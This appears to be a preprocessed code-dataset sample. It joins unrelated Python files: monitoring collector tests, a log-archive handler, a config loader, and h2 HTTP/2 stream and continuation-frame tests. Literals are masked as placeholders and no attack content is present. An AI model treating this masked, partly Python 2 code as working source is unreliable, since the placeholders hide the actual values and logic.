collect ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : ( - <NUM_LIT:1.0> ) , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> 
'<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:1.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from Handler import Handler <EOL> import logging <EOL> import logging . handlers <EOL> class ArchiveHandler ( Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config ) : <EOL> """<STR_LIT>""" <EOL> Handler . __init__ ( self , config ) <EOL> self . archive = logging . getLogger ( '<STR_LIT>' ) <EOL> self . archive . setLevel ( logging . DEBUG ) <EOL> self . archive . propagate = self . config [ '<STR_LIT>' ] <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> handler = logging . handlers . TimedRotatingFileHandler ( <EOL> filename = self . config [ '<STR_LIT>' ] , <EOL> when = '<STR_LIT>' , <EOL> interval = <NUM_LIT:1> , <EOL> backupCount = int ( self . config [ '<STR_LIT>' ] ) , <EOL> encoding = self . config [ '<STR_LIT>' ] <EOL> ) <EOL> handler . setFormatter ( formatter ) <EOL> handler . setLevel ( logging . DEBUG ) <EOL> self . archive . addHandler ( handler ) <EOL> def get_default_config_help ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( ArchiveHandler , self ) . get_default_config_help ( ) <EOL> config . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return config <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( ArchiveHandler , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> } ) <EOL> return config <EOL> def process ( self , metric ) : <EOL> """<STR_LIT>""" <EOL> self . archive . info ( str ( metric ) . strip ( ) ) </s>
<s> import configobj <EOL> import os <EOL> def str_to_bool ( value ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , basestring ) : <EOL> value = value . strip ( ) . lower ( ) <EOL> if value in [ '<STR_LIT:true>' , '<STR_LIT:t>' , '<STR_LIT:yes>' , '<STR_LIT:y>' ] : <EOL> return True <EOL> elif value in [ '<STR_LIT:false>' , '<STR_LIT:f>' , '<STR_LIT>' , '<STR_LIT:n>' , '<STR_LIT>' ] : <EOL> return False <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" % value ) <EOL> return value <EOL> def load_config ( configfile ) : <EOL> """<STR_LIT>""" <EOL> configfile = os . path . abspath ( configfile ) <EOL> config = configobj . ConfigObj ( configfile ) <EOL> config_extension = '<STR_LIT>' <EOL> if '<STR_LIT>' in config : <EOL> config_extension = config [ '<STR_LIT>' ] . get ( '<STR_LIT>' , config_extension ) <EOL> if '<STR_LIT:path>' in config [ '<STR_LIT>' ] : <EOL> for cfgfile in os . listdir ( config [ '<STR_LIT>' ] [ '<STR_LIT:path>' ] ) : <EOL> cfgfile = os . path . join ( config [ '<STR_LIT>' ] [ '<STR_LIT:path>' ] , <EOL> cfgfile ) <EOL> cfgfile = os . path . abspath ( cfgfile ) <EOL> if not cfgfile . endswith ( config_extension ) : <EOL> continue <EOL> newconfig = configobj . ConfigObj ( cfgfile ) <EOL> config . merge ( newconfig ) <EOL> if '<STR_LIT>' not in config : <EOL> raise Exception ( '<STR_LIT>' % configfile ) <EOL> if '<STR_LIT>' not in config : <EOL> config [ '<STR_LIT>' ] = configobj . ConfigObj ( ) <EOL> if '<STR_LIT>' in config [ '<STR_LIT>' ] : <EOL> handlers_config_path = config [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if os . path . exists ( handlers_config_path ) : <EOL> for cfgfile in os . listdir ( handlers_config_path ) : <EOL> cfgfile = os . path . join ( handlers_config_path , cfgfile ) <EOL> cfgfile = os . path . abspath ( cfgfile ) <EOL> if not cfgfile . endswith ( config_extension ) : <EOL> continue <EOL> filename = os . path . basename ( cfgfile ) <EOL> handler = os . path . 
splitext ( filename ) [ <NUM_LIT:0> ] <EOL> if handler not in config [ '<STR_LIT>' ] : <EOL> config [ '<STR_LIT>' ] [ handler ] = configobj . ConfigObj ( ) <EOL> newconfig = configobj . ConfigObj ( cfgfile ) <EOL> config [ '<STR_LIT>' ] [ handler ] . merge ( newconfig ) <EOL> if '<STR_LIT>' not in config : <EOL> config [ '<STR_LIT>' ] = configobj . ConfigObj ( ) <EOL> if '<STR_LIT>' in config [ '<STR_LIT>' ] : <EOL> collectors_config_path = config [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if os . path . exists ( collectors_config_path ) : <EOL> for cfgfile in os . listdir ( collectors_config_path ) : <EOL> cfgfile = os . path . join ( collectors_config_path , cfgfile ) <EOL> cfgfile = os . path . abspath ( cfgfile ) <EOL> if not cfgfile . endswith ( config_extension ) : <EOL> continue <EOL> filename = os . path . basename ( cfgfile ) <EOL> collector = os . path . splitext ( filename ) [ <NUM_LIT:0> ] <EOL> if collector not in config [ '<STR_LIT>' ] : <EOL> config [ '<STR_LIT>' ] [ collector ] = configobj . ConfigObj ( ) <EOL> try : <EOL> newconfig = configobj . ConfigObj ( cfgfile ) <EOL> except Exception , e : <EOL> raise Exception ( "<STR_LIT>" % <EOL> ( cfgfile , e ) ) <EOL> config [ '<STR_LIT>' ] [ collector ] . merge ( newconfig ) <EOL> for collector in config [ '<STR_LIT>' ] : <EOL> if '<STR_LIT>' in config [ '<STR_LIT>' ] [ collector ] : <EOL> config [ '<STR_LIT>' ] [ collector ] [ '<STR_LIT>' ] = str_to_bool ( <EOL> config [ '<STR_LIT>' ] [ collector ] [ '<STR_LIT>' ] <EOL> ) <EOL> return config </s>
<s> __VERSION__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import pkg_resources <EOL> import unittest <EOL> from hospital . assertions import packaging <EOL> class AssertSupportedPythonVersionTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_custom_msg ( self ) : <EOL> """<STR_LIT>""" <EOL> distribution = pkg_resources . get_distribution ( '<STR_LIT>' ) <EOL> version = '<STR_LIT>' <EOL> msg = "<STR_LIT>" <EOL> with self . assertRaises ( AssertionError ) as context : <EOL> packaging . assert_supported_python_version ( <EOL> distribution , <EOL> version , <EOL> msg = msg ) <EOL> self . assertEqual ( context . exception . args [ <NUM_LIT:0> ] , msg ) </s>
<s> """<STR_LIT>""" <EOL> import pytest <EOL> import h2 <EOL> import h2 . connection <EOL> class TestComplexClient ( object ) : <EOL> """<STR_LIT>""" <EOL> example_request_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:/>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ] <EOL> example_response_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> def test_correctly_count_server_streams ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> expected_inbound_streams = expected_outbound_streams = <NUM_LIT:0> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> for stream_id in range ( <NUM_LIT:1> , <NUM_LIT:15> , <NUM_LIT:2> ) : <EOL> c . send_headers ( stream_id , self . example_request_headers ) <EOL> expected_outbound_streams += <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> f = frame_factory . build_push_promise_frame ( <EOL> stream_id = stream_id , <EOL> promised_stream_id = stream_id + <NUM_LIT:1> , <EOL> headers = self . example_request_headers , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> f = frame_factory . build_headers_frame ( <EOL> stream_id = stream_id + <NUM_LIT:1> , <EOL> headers = self . example_response_headers , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> expected_inbound_streams += <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . 
open_outbound_streams == expected_outbound_streams <EOL> for stream_id in range ( <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT:2> ) : <EOL> c . end_stream ( stream_id ) <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> f = frame_factory . build_headers_frame ( <EOL> stream_id = stream_id , <EOL> headers = self . example_response_headers , <EOL> flags = [ '<STR_LIT>' ] , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> expected_outbound_streams -= <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> f = frame_factory . build_headers_frame ( <EOL> stream_id = stream_id + <NUM_LIT:1> , <EOL> headers = self . example_response_headers , <EOL> flags = [ '<STR_LIT>' ] , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> expected_inbound_streams -= <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> assert c . open_inbound_streams == <NUM_LIT:0> <EOL> assert c . open_outbound_streams == <NUM_LIT:0> <EOL> class TestComplexServer ( object ) : <EOL> """<STR_LIT>""" <EOL> example_request_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:/>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ] <EOL> example_response_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> def test_correctly_count_server_streams ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> expected_inbound_streams = expected_outbound_streams = <NUM_LIT:0> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . 
open_outbound_streams == expected_outbound_streams <EOL> for stream_id in range ( <NUM_LIT:1> , <NUM_LIT:15> , <NUM_LIT:2> ) : <EOL> f = frame_factory . build_headers_frame ( <EOL> headers = self . example_request_headers , <EOL> stream_id = stream_id , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> expected_inbound_streams += <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> c . push_stream ( stream_id , stream_id + <NUM_LIT:1> , self . example_request_headers ) <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> c . send_headers ( stream_id + <NUM_LIT:1> , self . example_response_headers ) <EOL> expected_outbound_streams += <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> for stream_id in range ( <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT:2> ) : <EOL> f = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT>' , <EOL> flags = [ '<STR_LIT>' ] , <EOL> stream_id = stream_id , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> c . send_data ( stream_id , b'<STR_LIT>' , end_stream = True ) <EOL> expected_inbound_streams -= <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> c . send_data ( <EOL> stream_id = stream_id + <NUM_LIT:1> , <EOL> data = b'<STR_LIT>' , <EOL> end_stream = True , <EOL> ) <EOL> expected_outbound_streams -= <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> assert c . 
open_inbound_streams == <NUM_LIT:0> <EOL> assert c . open_outbound_streams == <NUM_LIT:0> <EOL> class TestContinuationFrames ( object ) : <EOL> """<STR_LIT>""" <EOL> example_request_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:/>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ] <EOL> def _build_continuation_sequence ( self , headers , block_size , frame_factory ) : <EOL> f = frame_factory . build_headers_frame ( headers ) <EOL> header_data = f . data <EOL> chunks = [ <EOL> header_data [ x : x + block_size ] <EOL> for x in range ( <NUM_LIT:0> , len ( header_data ) , block_size ) <EOL> ] <EOL> f . data = chunks . pop ( <NUM_LIT:0> ) <EOL> frames = [ <EOL> frame_factory . build_continuation_frame ( c ) for c in chunks <EOL> ] <EOL> f . flags = set ( [ '<STR_LIT>' ] ) <EOL> frames [ - <NUM_LIT:1> ] . flags . add ( '<STR_LIT>' ) <EOL> frames . insert ( <NUM_LIT:0> , f ) <EOL> return frames <EOL> def test_continuation_frame_basic ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . initiate_connection ( ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> events = c . receive_data ( data ) <EOL> assert len ( events ) == <NUM_LIT:2> <EOL> first_event , second_event = events <EOL> assert isinstance ( first_event , h2 . events . RequestReceived ) <EOL> assert first_event . headers == self . example_request_headers <EOL> assert first_event . stream_id == <NUM_LIT:1> <EOL> assert isinstance ( second_event , h2 . events . StreamEnded ) <EOL> assert second_event . stream_id == <NUM_LIT:1> <EOL> @ pytest . mark . 
parametrize ( '<STR_LIT>' , [ <NUM_LIT:3> , <NUM_LIT:1> ] ) <EOL> def test_continuation_cannot_interleave_headers ( self , <EOL> frame_factory , <EOL> stream_id ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . initiate_connection ( ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> c . clear_outbound_data_buffer ( ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_headers_frame ( <EOL> headers = self . example_request_headers , <EOL> stream_id = stream_id , <EOL> flags = [ '<STR_LIT>' ] , <EOL> ) <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> def test_continuation_cannot_interleave_data ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . initiate_connection ( ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> c . clear_outbound_data_buffer ( ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT:hello>' , <EOL> stream_id = <NUM_LIT:1> , <EOL> ) <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . 
receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> def test_continuation_cannot_interleave_unknown_frame ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . initiate_connection ( ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> c . clear_outbound_data_buffer ( ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT:hello>' , <EOL> stream_id = <NUM_LIT:1> , <EOL> ) <EOL> bogus_frame . type = <NUM_LIT> <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> class TestContinuationFramesPushPromise ( object ) : <EOL> """<STR_LIT>""" <EOL> example_request_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:/>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ] <EOL> example_response_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> def _build_continuation_sequence ( self , headers , block_size , frame_factory ) : <EOL> f = frame_factory . build_push_promise_frame ( <EOL> stream_id = <NUM_LIT:1> , promised_stream_id = <NUM_LIT:2> , headers = headers <EOL> ) <EOL> header_data = f . data <EOL> chunks = [ <EOL> header_data [ x : x + block_size ] <EOL> for x in range ( <NUM_LIT:0> , len ( header_data ) , block_size ) <EOL> ] <EOL> f . data = chunks . pop ( <NUM_LIT:0> ) <EOL> frames = [ <EOL> frame_factory . 
build_continuation_frame ( c ) for c in chunks <EOL> ] <EOL> f . flags = set ( [ '<STR_LIT>' ] ) <EOL> frames [ - <NUM_LIT:1> ] . flags . add ( '<STR_LIT>' ) <EOL> frames . insert ( <NUM_LIT:0> , f ) <EOL> return frames <EOL> def test_continuation_frame_basic_push_promise ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( stream_id = <NUM_LIT:1> , headers = self . example_request_headers ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> events = c . receive_data ( data ) <EOL> assert len ( events ) == <NUM_LIT:1> <EOL> event = events [ <NUM_LIT:0> ] <EOL> assert isinstance ( event , h2 . events . PushedStreamReceived ) <EOL> assert event . headers == self . example_request_headers <EOL> assert event . parent_stream_id == <NUM_LIT:1> <EOL> assert event . pushed_stream_id == <NUM_LIT:2> <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> def test_continuation_cannot_interleave_headers_pp ( self , <EOL> frame_factory , <EOL> stream_id ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( stream_id = <NUM_LIT:1> , headers = self . example_request_headers ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_headers_frame ( <EOL> headers = self . example_response_headers , <EOL> stream_id = stream_id , <EOL> flags = [ '<STR_LIT>' ] , <EOL> ) <EOL> frames . 
insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> def test_continuation_cannot_interleave_data ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( stream_id = <NUM_LIT:1> , headers = self . example_request_headers ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT:hello>' , <EOL> stream_id = <NUM_LIT:1> , <EOL> ) <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> def test_continuation_cannot_interleave_unknown_frame ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( stream_id = <NUM_LIT:1> , headers = self . example_request_headers ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT:hello>' , <EOL> stream_id = <NUM_LIT:1> , <EOL> ) <EOL> bogus_frame . type = <NUM_LIT> <EOL> frames . 
insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ True , False ] ) <EOL> def test_stream_remotely_closed_disallows_push_promise ( self , <EOL> evict , <EOL> frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( <EOL> stream_id = <NUM_LIT:1> , <EOL> headers = self . example_request_headers , <EOL> end_stream = True <EOL> ) <EOL> f = frame_factory . build_headers_frame ( <EOL> stream_id = <NUM_LIT:1> , <EOL> headers = self . example_response_headers , <EOL> flags = [ '<STR_LIT>' ] <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> c . clear_outbound_data_buffer ( ) <EOL> if evict : <EOL> assert not c . open_outbound_streams <EOL> f = frame_factory . build_push_promise_frame ( <EOL> stream_id = <NUM_LIT:1> , <EOL> promised_stream_id = <NUM_LIT:2> , <EOL> headers = self . example_request_headers , <EOL> ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) : <EOL> c . receive_data ( f . serialize ( ) ) <EOL> f = frame_factory . build_goaway_frame ( <EOL> last_stream_id = <NUM_LIT:0> , <EOL> error_code = h2 . errors . PROTOCOL_ERROR , <EOL> ) <EOL> assert c . data_to_send ( ) == f . serialize ( ) </s>
